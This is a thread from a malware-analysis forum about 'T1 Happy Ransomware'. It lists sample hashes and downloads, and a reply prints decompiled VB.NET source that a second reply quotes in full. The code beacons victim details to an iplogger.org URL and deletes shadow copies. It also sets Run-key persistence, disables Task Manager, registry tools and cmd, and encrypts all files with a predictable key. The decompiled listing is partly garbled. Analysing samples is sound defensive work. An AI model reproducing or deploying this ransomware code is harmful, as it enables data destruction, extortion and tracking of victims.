A forum for reverse engineering, OS internals and malware analysis 

Happy Ransomware (T1)

Forum for analysis and discussion about malware.

Happy Ransomware (T1)

 #32541  by joytv
 Tue Jan 29, 2019 1:41 pm
T1 Happy Ransomware
Sample 1:
MD5: 29cdb46d2e01f2efb9644c7695a007bb
VT: https://www.virustotal.com/#/file/3ed94 ... /detection

Sample 2:
MD5: b7afca788487347804156f052c613db5
VT: https://www.virustotal.com/#/file/b7afc ... 052c613db5
Attachments
Password: infected
(13.96 KiB) Downloaded 43 times
Password: infected
(13.99 KiB) Downloaded 47 times

Re: Happy Ransomware (T1)

 #32544  by hackr8
 Tue Jan 29, 2019 3:04 pm
I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:
Code: Select all
Private Sub EndOf()
    System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
    Try
        webclient1.Headers
        "User-Agent"
        New String(9) {}
        New String(9) {}(0) = "Name="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
        webclient1.DownloadData("https://iplogger.org/21zut")
    
    Finally
        If (webclient1 Is Not Nothing) Then
            webclient1.Dispose()
        End If
    End Try
    System.Threading.Thread.Sleep(15000)
    ProjectData.EndApp()
End Sub
Private Sub Regs()
    New Process()
    New Process().StartInfo.FileName = "wmic.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
    Try
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
End Sub
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
    Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
    Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
    Try
        rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
        rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
        Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
        Return rijndaelmanaged1.CreateEncryptor()
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
    Return Nothing
End Function
Private Sub EncryptDirectory(ByVal path As String)
    Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
    Dim num1 As Integer = 0
    Do While (num1 < array1.Length()) 
        Dim str1 As String = array1(num1)
        Try
            System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
            T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
            Me.i = (Me.i + 1)
        
        Catch exception1 As Exception
        End Try
        num1 = (num1 + 1)
    
    Loop
End Sub

Re: Happy Ransomware (T1)

 #32547  by joytv
 Wed Jan 30, 2019 8:37 pm
hackr8 wrote: Tue Jan 29, 2019 3:04 pm I personally think that it is a rather cheap VB.NET/C# ransomware
Part of the code:
Code: Select all
Private Sub EndOf()
    System.IO.File.WriteAllText(Interaction.Environ("userprofile") & "\Desktop\HIT BY RANSOMWARE.txt", T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("userprofile"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("appdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    System.IO.File.WriteAllText(Interaction.Environ("programdata"), T1.My.Resources.Resources.HIT_BY_RANSOMWARE)
    Dim webclient1 As System.Net.WebClient = New System.Net.WebClient()
    Try
        webclient1.Headers
        "User-Agent"
        New String(9) {}
        New String(9) {}(0) = "Name="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="
        New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now).Item(New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files=") = New String(9) {}(0) = "Name="(1) = T1.My.MyProject.User.Name(2) = "; OS="(3) = T1.My.MyProject.Computer.Info.OSFullName(4) = "; RAM="(5) = Conversions.ToString(Math.Round((T1.My.MyProject.Computer.Info.TotalPhysicalMemory / 1073741824), 2))(6) = "; Time="(7) = Conversions.ToString(DateTime.Now)(8) = "; Encrypted Files="(9) = Me.i.ToString()
        webclient1.DownloadData("https://iplogger.org/21zut")
    
    Finally
        If (webclient1 Is Not Nothing) Then
            webclient1.Dispose()
        End If
    End Try
    System.Threading.Thread.Sleep(15000)
    ProjectData.EndApp()
End Sub
Private Sub Regs()
    New Process()
    New Process().StartInfo.FileName = "wmic.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start()
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe"
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\".""
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden
    New Process().StartInfo.FileName = "wmic.exe".StartInfo.Arguments = "shadowcopy delete".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().StartInfo.FileName = "cmd.exe".StartInfo.Arguments = "/c takeown /f " & Interaction.Environ("systemroot") & "\"."".StartInfo.WindowStyle = ProcessWindowStyle.Hidden.Start().Dispose()
    Try
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Cortana", Assembly.GetExecutingAssembly().Location)
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableTaskMgr", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", True).SetValue("DisableRegistryTools", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Policies\Microsoft\Windows", True).CreateSubKey("System").SetValue("DisableCMD", CType(1, Integer))
        Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows Script Host\Settings", True).SetValue("Enabled", CType(0, Integer))
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
End Sub
Private Function EnCrypt(ByVal input As Byte(), ByVal key As String) As Byte()
    Dim rijndaelmanaged1 As System.Security.Cryptography.RijndaelManaged = New System.Security.Cryptography.RijndaelManaged()
    Dim sha256cng1 As System.Security.Cryptography.SHA256Cng = New System.Security.Cryptography.SHA256Cng()
    Try
        rijndaelmanaged1.Key = sha256cng1.ComputeHash(System.Text.Encoding.ASCII.GetBytes(key))
        rijndaelmanaged1.Mode = System.Security.Cryptography.CipherMode.ECB
        Dim array2 As Byte() = input.TransformFinalBlock(array2, 0, array2.Length())
        Return rijndaelmanaged1.CreateEncryptor()
    
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
    End Try
    Return Nothing
End Function
Private Sub EncryptDirectory(ByVal path As String)
    Dim array1 As String() = System.IO.Directory.GetFiles(path, "*", System.IO.SearchOption.AllDirectories)
    Dim num1 As Integer = 0
    Do While (num1 < array1.Length()) 
        Dim str1 As String = array1(num1)
        Try
            System.IO.File.WriteAllBytes(str1, Me.EnCrypt(System.IO.File.ReadAllBytes(str1), (Me.i + 1).ToString() & "GbVjXehg"))
            T1.My.MyProject.Computer.FileSystem.RenameFile(str1, T1.My.MyProject.Computer.FileSystem.GetName(str1) & ".happy")
            Me.i = (Me.i + 1)
        
        Catch exception1 As Exception
        End Try
        num1 = (num1 + 1)
    
    Loop
End Sub
100% .Net cheap ransomware.
 Return to “Malware”